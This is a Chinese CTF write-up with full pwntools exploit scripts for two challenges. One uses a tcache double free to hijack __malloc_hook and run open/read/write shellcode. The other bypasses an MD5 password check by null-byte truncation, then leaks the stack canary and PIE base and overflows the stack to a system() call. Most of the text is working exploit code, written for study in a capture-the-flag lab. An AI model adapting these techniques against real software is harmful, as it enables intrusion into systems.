EasyHeap
向可执行的地方写入orw(open/read/write)的shellcode,利用tcachebin的df(double free)劫持malloc_hook,
然后调用add来触发。
from pwn import *
# Describe the target to pwntools: 64-bit Linux, with verbose I/O logging.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

# Start the challenge binary locally with the bundled libc preloaded, and
# load both ELF files so symbols can be looked up by name.
p = process('./Easyheap', env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('./libc-2.27.so')
elf = ELF('./Easyheap')


# Short aliases around the tube `p`.  The send helpers pass every argument
# through str(), so they are only suitable for text and integers; raw byte
# payloads in this script are sent with p.send*/p.sendafter directly.
def s(data):
    return p.send(str(data))


def sa(delim, data):
    return p.sendafter(str(delim), str(data))


def sl(data):
    return p.sendline(str(data))


def sla(delim, data):
    return p.sendlineafter(str(delim), str(data))


def r(num):
    return p.recv(num)


def ru(delims, drop=True):
    return p.recvuntil(delims, drop)


def itr():
    return p.interactive()


def uu32(data):
    # Zero-pad a short read on the right to 4 bytes before unpacking.
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    # Zero-pad a short read on the right to 8 bytes before unpacking.
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    # Log a recovered address as "<name> = 0x...".
    return log.success('{} = {:#x}'.format(name, addr))
def debug():
    """Attach gdb to the running target, then wait for a keypress."""
    gdb.attach(p)
    pause()
def add(size, con):
    """Drive menu option 1: answer the size prompt, then send the content.

    `con` is sent exactly as given, with no newline appended. The menu choice
    and the size go through `sla`, which stringifies them and appends a
    newline.
    """
    menu_choice = "1"
    sla(">> :\n", menu_choice)
    sla("Size: \n", size)
    p.sendafter("Content: \n", con)
def delete(index):
    """Drive menu option 2 for the entry numbered `index`."""
    idx_text = str(index)
    sla(">> :\n", "2")
    sla("Index:\n", idx_text)
def show(index):
    """Drive menu option 3 for the entry numbered `index`.

    The target's reply is left unread; the caller consumes it afterwards.
    """
    idx_text = str(index)
    sla(">> :\n", "3")
    sla("Index:\n", idx_text)
def edit(index, con):
    """Drive menu option 4: pick entry `index`, then send new content.

    As in `add`, `con` is sent as-is with no trailing newline.
    """
    idx_text = str(index)
    sla(">> :\n", "4")
    sla("Index:\n", idx_text)
    p.sendafter("Content:\n", con)
# NOTE(review): this whole sequence is tied to the bundled libc-2.27.so.
# Upstream glibc added a tcache double-free check in 2.29 and safe-linking in
# 2.32, and removed __malloc_hook in 2.34, so neither the offsets nor the
# technique carry over to current glibc.

# --- Heap layout -----------------------------------------------------------
# Six entries; the script assumes the target numbers them 0-5 in creation
# order (confirm against the binary).  Entry 1 uses size 0x420, presumably so
# that freeing it places the chunk in the unsorted bin rather than tcache.
add(0x40,'bpc')
add(0x420,'bpc'*0x160)
add(0x40,'bpc')
add(0x40,'a'*0x40)
add(0x40,'bpc')
add(0x10,'bpc')

# --- libc base leak --------------------------------------------------------
# Free entry 1, refill entry 0 with 0x20 filler bytes and print it; the six
# bytes that follow the filler in the output are taken as a libc pointer.
delete(1)
edit(0,'a'*0x20)
show(0)
ru(0x20*'a')
# 0x3EBCA0 is a hard-coded offset, valid only for this libc build.
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
# Despite its name, `malloc` holds the address of __malloc_hook.
malloc = libcbase + libc.sym['__malloc_hook']
# Fixed address used as the shellcode destination.  The writeup calls it an
# executable region; presumably the target maps it itself (TODO confirm).
mmap = 0x23330000

# --- Stage 1: obtain an entry located at `mmap` -----------------------------
# After entry 3 is freed, edit(2, ...) writes 0x10 filler, a zero qword, a
# size field of 0x51 and then the `mmap` address.  The two add(0x40) calls
# that follow are expected to hand out a chunk at `mmap`; since edit(3, ...)
# below stores the shellcode, that chunk presumably ends up as index 3.
# NOTE(review): str + bytes concatenation only works on Python 2; on
# Python 3 p64() returns bytes and this line raises TypeError.
delete(3)
edit(2, 'a'*0x10+p64(0)+p64(0x51)+p64(mmap))
add(0x40,'a'*0x40)
add(0x40,'a'*0x40)

# open("flag") / read / write shellcode, using mmap+0x200 as the buffer.
# fd 3 is hard-coded on the assumption that open() returns the first free
# descriptor after 0-2.
shellcode = shellcraft.open("flag")
shellcode += shellcraft.read(3, mmap+0x200, 0x50)
shellcode += shellcraft.write(1, mmap+0x200, 0x50)
shellcode = asm(shellcode)
edit(3, shellcode)

# --- Stage 2: point __malloc_hook at `mmap` ----------------------------------
# Same pattern as stage 1, with a size field of 0x21 and the __malloc_hook
# address.  `mmap` is then written through the second add(0x10) and again
# through edit(6, ...), presumably landing in __malloc_hook.
# NOTE(review): same Python 2-only str + bytes concatenation as above.
delete(5)
edit(4, 'a'*0x10+p64(0)+p64(0x21)+p64(malloc))
add(0x10,'bpc')
add(0x10,p64(mmap))
edit(6,p64(mmap))

# --- Trigger ---------------------------------------------------------------
# Per the writeup, one more add() is what invokes the overwritten hook.
add(0x20,'bpc')
#debug()
itr()
old_thing
第一关就是一个逆向,逆向出密码是啥
好叭,密码不太行emmm,直接学习网络上大佬00绕过的方法:利用password的长度进行截断,输入0x20个字符会将用于比较的s2开头的字符置为00,所以此时我们需要构造md5后开头为00的字符串对,此时s1的开头也就是00,两边在比较时都在开头的00处结束(比较用的应该是strcmp这类遇到00就停止的函数),就可以绕过密码比较。利用下面的脚本进行爆破寻找这样的字符串对:(抄的)
import os
import hashlib
# Draw random 0x20-byte keys until one has an MD5 hex digest beginning with
# "00" (i.e. the first digest byte is zero), then print it and stop.
while True:
    key = os.urandom(0x20)
    res = hashlib.md5(key).hexdigest()
    if res.startswith("00"):
        print("find: ", res, key)
        break
绕过这个密码之后就是简单的栈溢出的叭
from pwn import *
# Describe the target to pwntools: 64-bit Linux, with verbose I/O logging.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

# Start the challenge binary locally.  The libc preload and the libc ELF are
# disabled in this script:
#   , env={"LD_PRELOAD":'./libc-2.27.so'})
#   libc = ELF('./libc-2.27.so')
p = process('./canary3')
elf = ELF('./canary3')


# Short aliases around the tube `p`.  The send helpers pass every argument
# through str(), so they are only suitable for text and integers; raw byte
# payloads in this script are sent with p.send*/p.sendlineafter directly.
def s(data):
    return p.send(str(data))


def sa(delim, data):
    return p.sendafter(str(delim), str(data))


def sl(data):
    return p.sendline(str(data))


def sla(delim, data):
    return p.sendlineafter(str(delim), str(data))


def r(num):
    return p.recv(num)


def ru(delims, drop=True):
    return p.recvuntil(delims, drop)


def itr():
    return p.interactive()


def uu32(data):
    # Zero-pad a short read on the right to 4 bytes before unpacking.
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    # Zero-pad a short read on the right to 8 bytes before unpacking.
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    # Log a recovered address as "<name> = 0x...".
    return log.success('{} = {:#x}'.format(name, addr))
def debug():
    """Attach gdb to the running target, then wait for a keypress."""
    gdb.attach(p)
    pause()
# --- Login -------------------------------------------------------------------
p.recvuntil("please input username: ")
p.send(b"admin")
p.recvuntil("please input password: ")
# 0x20-byte password.  Per the writeup it is one of the brute-forced inputs
# whose MD5 starts with 00 (not re-verified here).
pad = b"b\x80\xfd\xfd[b'\xbb$U\xc6\x8fkw[^\x8a3\xb5h\xb4\xfb\xec\xfe\x15\x08\x85\x0e\x17\xb6y\xf3"
p.send(pad)

# --- Stack canary leak -------------------------------------------------------
# Option 2 takes input and option 1 prints it back (inferred from the prompts
# and the reads that follow; confirm against the binary).
# NOTE(review): both leaks below rely on the target echoing bytes beyond what
# was sent, i.e. presumably printing the buffer without a terminator.
sla('3.exit\n',2)
p.sendlineafter('your input:\n','a'*0x18)
sla('3.exit\n',1)
ru('a'*0x18+'\n')
# Seven bytes are read after the filler and its newline, then shifted left by
# one byte (*0x100) so the low byte of the rebuilt value is 00.
canary = uu64(r(7))*0x100
leak('canary',canary)

# --- PIE base leak -----------------------------------------------------------
# Same pattern with 0x1f filler bytes; six bytes are read back and a
# hard-coded offset (0x2530, specific to this build of canary3) is subtracted.
sla('3.exit\n',2)
pl = 'a'*0x1f
p.sendlineafter('your input:\n',pl)
sla('3.exit\n',1)
ru('a'*0x1f+'\n')
pie = uu64(r(6))-0x2530
leak('pie',pie)
# Address at offset 0x23AF inside the binary; the name suggests it leads to a
# system() call (TODO confirm in the disassembly).
system = pie+0x023AF

# --- Final input -------------------------------------------------------------
# 0x18 filler, the recovered canary, 8 more filler bytes, then `system`.
# NOTE(review): str + bytes concatenation only works on Python 2; on
# Python 3 p64() returns bytes and this line raises TypeError.
sla('3.exit\n',2)
pl = 'a'*0x18 + p64(canary) + 'a'*8 + p64(system)
p.sendlineafter('your input:\n',pl)
# Option 3 (exit) presumably makes the function return, which is when the
# overwritten return address is used.
sla('3.exit\n',3)
#debug()
itr()